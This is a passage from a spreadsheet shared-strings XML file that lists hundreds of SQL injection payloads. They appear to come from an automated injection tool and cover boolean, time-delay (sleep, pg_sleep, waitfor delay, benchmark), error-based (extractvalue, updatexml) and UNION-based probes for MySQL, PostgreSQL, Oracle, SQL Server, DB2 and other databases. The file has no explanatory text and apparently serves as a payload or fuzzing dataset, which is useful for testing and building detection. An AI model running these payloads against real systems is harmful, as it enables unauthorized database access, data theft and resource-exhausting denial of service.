    <t>1'  )  )   and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  'yhku' like 'yhku</t>
  </si>
  <si>
    <t>1'+ ( select 'xpby' where 2724 = 2724</t>
  </si>
  <si>
    <t>1'+ ( select 'wvqj' where 3709 = 3709</t>
  </si>
  <si>
    <t>-2783' where 1494 = 1494 union all select 1494,1494,1494,1494,1494,1494--</t>
  </si>
  <si>
    <t>1'+ ( select 'mdiu' where 4443 = 4443</t>
  </si>
  <si>
    <t>1'+ ( select hsef where 4136 = 4136 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   ) +'</t>
  </si>
  <si>
    <t>1"  )  )   as gvpm where 5170 = 5170 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1  )  )   as jyfo where 8121 = 8121 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1%'  )  )   and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (  'obeh' = 'obeh</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000  )  )  +'</t>
  </si>
  <si>
    <t>1'+ ( select nzij where 5456 = 5456 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x  )  )  +'</t>
  </si>
  <si>
    <t>1" where 6111 = 6111 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1"  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and "kszu" = "kszu</t>
  </si>
  <si>
    <t>1%'  )  )   or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1%" and 4595 = 4595#</t>
  </si>
  <si>
    <t>1' )  and 8404 = 8651#</t>
  </si>
  <si>
    <t>1'+ ( select zwsr where 6567 = 6567</t>
  </si>
  <si>
    <t>1"</t>
  </si>
  <si>
    <t>1" where 6200 = 6200 and elt ( 1210 = 1210,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-3865' )  union all select 4935,4935,4935,4935,4935--</t>
  </si>
  <si>
    <t>1' where 7828 = 7828 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1'+ ( select inyd where 1668 = 1668 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   ) +'</t>
  </si>
  <si>
    <t>1%' )  and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1'+ ( select 'ejox' where 2719 = 2719 union all select null,null,null#</t>
  </si>
  <si>
    <t>1 where 3502 = 3502 order by 1--</t>
  </si>
  <si>
    <t>1"  )  )   union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1  )  )   and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1 )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and  ( 1773 = 1773</t>
  </si>
  <si>
    <t>1"  )  )   or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  "dqis" = "dqis</t>
  </si>
  <si>
    <t>-3441'  )  )   as dxvt where 9291 = 9291 union all select 9291,9291,9291#</t>
  </si>
  <si>
    <t>-5013'  )  )   )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +ch</t>
  </si>
  <si>
    <t>1  )  )   as vryv where 5600 = 5600</t>
  </si>
  <si>
    <t>1" )  and 7533 = 7533 and  ( "yqzq" = "yqzq</t>
  </si>
  <si>
    <t>1'|| ( select 'xuou' from dual where 7681 = 7681 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   ) ||'</t>
  </si>
  <si>
    <t>1'  )  )   )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (   ( 'yqhk' = 'yqhk</t>
  </si>
  <si>
    <t>-7518" or elt ( 8413 = 3995,3995 )  and "cpnf" = "cpnf</t>
  </si>
  <si>
    <t>1"  )  )   and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (  "afby" = "afby</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-4828%' )  or 8678 = 5745#</t>
  </si>
  <si>
    <t>1'  )  )   )  or sleep ( 5 )  and   (  (   ( 'ecur' = 'ecur</t>
  </si>
  <si>
    <t>1%'  )  )   and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1'+ ( select 'vjoj' where 5348 = 5348</t>
  </si>
  <si>
    <t>-3769"  )  )   )  union all select 8456#</t>
  </si>
  <si>
    <t>1  )  )   and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  7200 = 7200</t>
  </si>
  <si>
    <t>1 where 7452 = 7452 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1" and  ( 7597 = 8422 ) *8422 and "gywp" like "gywp</t>
  </si>
  <si>
    <t>-6772"  )  )   or 9323 = 9323#</t>
  </si>
  <si>
    <t>1"  )  )   )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( "nevr" like "nevr</t>
  </si>
  <si>
    <t>1'|| ( select 'zvpl' where 5877 = 5877 union all select null,null#</t>
  </si>
  <si>
    <t>1' where 6168 = 6168</t>
  </si>
  <si>
    <t>1%'  )  )   )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1' )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and  ( 'nqol' = 'nqol</t>
  </si>
  <si>
    <t>1" or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and "jtgs" like "jtgs</t>
  </si>
  <si>
    <t>select  ( case when  ( 4755 = 4784 )  then 1 else 4755* ( select 4755 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1%' )  union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 3950 = 2747 )  then 1 else 1/ ( select 0 )  end  )  )  </t>
  </si>
  <si>
    <t>1%" )  and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5  )  )  +'</t>
  </si>
  <si>
    <t>1%'  )  )   or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) </t>
  </si>
  <si>
    <t xml:space="preserve"> ( select 2768 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 2768 = 2768,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) </t>
  </si>
  <si>
    <t>1'  )  )   and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (  'inrm' like 'inrm</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,null,null,null--</t>
  </si>
  <si>
    <t>-8684' where 9820 = 9820 or 6844 = 5105</t>
  </si>
  <si>
    <t xml:space="preserve">-1252' )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 </t>
  </si>
  <si>
    <t>1' where 3362 = 3362</t>
  </si>
  <si>
    <t>-6449'  )  )   or 2590 = 2848</t>
  </si>
  <si>
    <t>1'|| ( select 'scct' where 2587 = 2587 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno  )  )  ||'</t>
  </si>
  <si>
    <t>1 )  union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1' )  and 7533 = 7533</t>
  </si>
  <si>
    <t>if ( 8574 = 7534 )  select 8574 else drop function nxbe--</t>
  </si>
  <si>
    <t>1 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) -- yekf</t>
  </si>
  <si>
    <t>1%" and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and "%" = "</t>
  </si>
  <si>
    <t>1'+ ( select 'ples' where 4244 = 4244 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1  )  )  +'</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (   ( 'jirc' = 'jirc</t>
  </si>
  <si>
    <t>1%'  )  )   )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1 )  where 8094 = 8094</t>
  </si>
  <si>
    <t>1" )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( "vurb" like "vurb</t>
  </si>
  <si>
    <t>1  )  )   as faxr where 7972 = 7972 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1" or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1' where 3337 = 3337 and 8403 = 5760</t>
  </si>
  <si>
    <t>1%"  )  )   or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1  )  )   )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (   ( 2197 = 2197</t>
  </si>
  <si>
    <t>-2962'  )  )   )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +ch</t>
  </si>
  <si>
    <t>-9315'  )  )   )  union all select 5057,5057,5057,5057,5057#</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 9525 = 9280 )  then 9525 else 9525* ( select 9525 from master..sysdatabases )  end  )  )  </t>
  </si>
  <si>
    <t>1'  )  )   as umah where 3781 = 3781 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>1" where 5250 = 5250</t>
  </si>
  <si>
    <t>1" or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and "cgpm" like "cgpm</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1%" )  or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( 'yiem' = 'yiem</t>
  </si>
  <si>
    <t>1 )  as vqdh where 1603 = 1603</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 'yqrt' like 'yqrt</t>
  </si>
  <si>
    <t>-6766'  )  )   )  or 3038 = 3038</t>
  </si>
  <si>
    <t>-9054" )  as rgyu where 3792 = 3792 order by 1--</t>
  </si>
  <si>
    <t>1'  )  )   and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  'kqip' like 'kqip</t>
  </si>
  <si>
    <t>1  )  )   as mgvw where 4923 = 4923 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1" )  as bpmk where 6412 = 6412 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>-5211 union all select 1754--</t>
  </si>
  <si>
    <t>1"  )  )   and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (  "cowu" like "cowu</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 1609 = 1609 )  then waitfor delay '0:0:5' else 1609* ( select 1609 from master..sysdatabases )  end  )  )  </t>
  </si>
  <si>
    <t>1'  )  )   and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (  'vpqr' = 'vpqr</t>
  </si>
  <si>
    <t>1  )  )   as uvep where 6016 = 6016 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1'|| ( select 'gnil' from dual where 7552 = 7552 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   ) ||'</t>
  </si>
  <si>
    <t>1%" )  union all select null#</t>
  </si>
  <si>
    <t>1' and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and 'wytg' = 'wytg</t>
  </si>
  <si>
    <t>1%"  )  )   )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1" and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and "ardk" like "ardk</t>
  </si>
  <si>
    <t>-2722" )  or 4907 = 8126#</t>
  </si>
  <si>
    <t>-1337" )  union all select 7508--</t>
  </si>
  <si>
    <t>1'  )  )   )  rlike  ( select  ( case when  ( 5524 = 9582 )  then 1 else 0x28 end  )  )   and   (  (   ( 'okoj' like 'okoj</t>
  </si>
  <si>
    <t>1' or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and 'drui' like 'drui</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and   (  (   ( "lpeo" = "lpeo</t>
  </si>
  <si>
    <t>1" and make_set ( 8403 = 8403,8899 )  and "fqxr" like "fqxr</t>
  </si>
  <si>
    <t>1%"  )  )   and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and  ( "%" = "</t>
  </si>
  <si>
    <t>-6496"  )  )   )  or 1471 = 5278 and   (  (   ( "zkoj" = "zkoj</t>
  </si>
  <si>
    <t>1%' )  union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-4798%'  )  )   )  union all select 3330,3330,3330#</t>
  </si>
  <si>
    <t>1 )  as fhvb where 4008 = 4008</t>
  </si>
  <si>
    <t>-7207' or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) |</t>
  </si>
  <si>
    <t>1'  )  )   )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( 'ugoz' = 'ugoz</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and  ( "%" = "</t>
  </si>
  <si>
    <t>1"  )  )   )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( "dksc" = "dksc</t>
  </si>
  <si>
    <t>1  )  )   union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'  )  )   )  union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'  )  )   )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>-5493"  )  )   union all select 8001,8001--</t>
  </si>
  <si>
    <t>1'|| ( select 'ozoj' where 1608 = 1608</t>
  </si>
  <si>
    <t>1" )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( "oxxi" = "oxxi</t>
  </si>
  <si>
    <t>1" )  and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1 where 4153 = 4153 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>-4705' where 2029 = 2029 union all select 2029,2029,2029#</t>
  </si>
  <si>
    <t>1' )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( 'obmu' = 'obmu</t>
  </si>
  <si>
    <t>1'  )  )   as jmnw where 6496 = 6496 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1"  )  )   and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  "quni" = "quni</t>
  </si>
  <si>
    <t>-3186 or 3867 = 9405</t>
  </si>
  <si>
    <t>1'  )  )   or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  'dkra' like 'dkra</t>
  </si>
  <si>
    <t>1 )  as tykp where 6851 = 6851</t>
  </si>
  <si>
    <t>-4465%' union all select 6196,6196,6196,6196,6196,6196,6196,6196--</t>
  </si>
  <si>
    <t>1' where 4272 = 4272 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>-9854%"  )  )   )  or 6455 = 3652</t>
  </si>
  <si>
    <t>-2806'  )  )   )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +cha</t>
  </si>
  <si>
    <t>1'  )  )   )  and elt ( 4249 = 4249,7259 )  and   (  (   ( 'kbkz' = 'kbkz</t>
  </si>
  <si>
    <t>1" )  where 5065 = 5065</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 5777 = 5777 )  then 1 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual ) </t>
  </si>
  <si>
    <t xml:space="preserve">call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) </t>
  </si>
  <si>
    <t>1"  )  )   or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  "nobt" = "nobt</t>
  </si>
  <si>
    <t>-7770' where 6503 = 6503 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 7018 = 7018 )  then 7018 else 7018* ( select 7018 from master..sysdatabases )  end  )  )  </t>
  </si>
  <si>
    <t>1'  )  )   as popm where 6594 = 6594 union all select null,null#</t>
  </si>
  <si>
    <t>1'|| ( select 'xtcb' where 5240 = 5240</t>
  </si>
  <si>
    <t>1%'  )  )   )  or sleep ( 5 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1%' and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and '%' = '</t>
  </si>
  <si>
    <t>1" )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( "azpb" = "azpb</t>
  </si>
  <si>
    <t>1 )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and  ( 4959 = 4959</t>
  </si>
  <si>
    <t>1' where 4473 = 4473 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1%'  )  )   )  waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1'  )  )   union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve">select count ( * )  from generate_series ( 1,5000000 ) </t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and  ( "jzmg" = "jzmg</t>
  </si>
  <si>
    <t>1'  )  )   )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( 'zeum' = 'zeum</t>
  </si>
  <si>
    <t>-3672"  )  )   union all select 6093#</t>
  </si>
  <si>
    <t>-4527' union all select 7115,7115#</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-3860' union all select 3510,3510,3510#</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual-- vykx</t>
  </si>
  <si>
    <t>1" )  as gjlv where 1983 = 1983 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1' where 4115 = 4115</t>
  </si>
  <si>
    <t>1"  )  )   as ccjk where 1932 = 1932 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-6407' )  or elt ( 1631 = 4946,4946 )  and  ( 'jpnz' = 'jpnz</t>
  </si>
  <si>
    <t>1 )  and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>-4136'  )  )   as cczp where 7052 = 7052 union all select 7052,7052,7052,7052,7052,7052,7052,7052,7052,7052#</t>
  </si>
  <si>
    <t>-4538'  )  )   )  or 3260 = 1236 and   (  (   ( 'hpnd' like 'hpnd</t>
  </si>
  <si>
    <t>1%' and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1"  )  )   )  or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (   ( "jref" like "jref</t>
  </si>
  <si>
    <t>-3633' )  where 3513 = 3513 union all select 3513,3513,3513,3513,3513,3513,3513,3513,3513,3513#</t>
  </si>
  <si>
    <t xml:space="preserve">-5020%' )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  </t>
  </si>
  <si>
    <t>1"  )  )   as tjdz where 8656 = 8656 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'  )  )   and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (  'ocfi' = 'ocfi</t>
  </si>
  <si>
    <t>1  )  )   as prnp where 4932 = 4932 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1' )  as pxcd where 9754 = 9754 or sleep ( 5 ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 7645 = 5921 )  then 7645 else 7645* ( select 7645 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and "zhsc" = "zhsc</t>
  </si>
  <si>
    <t>-7779' )  where 4976 = 4976 or 6872 = 6872--</t>
  </si>
  <si>
    <t>1"  )  )   )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "urqg" = "urqg</t>
  </si>
  <si>
    <t>1' )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and  ( 'jvll' like 'jvll</t>
  </si>
  <si>
    <t>1'  )  )   as kpdl where 4443 = 4443 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
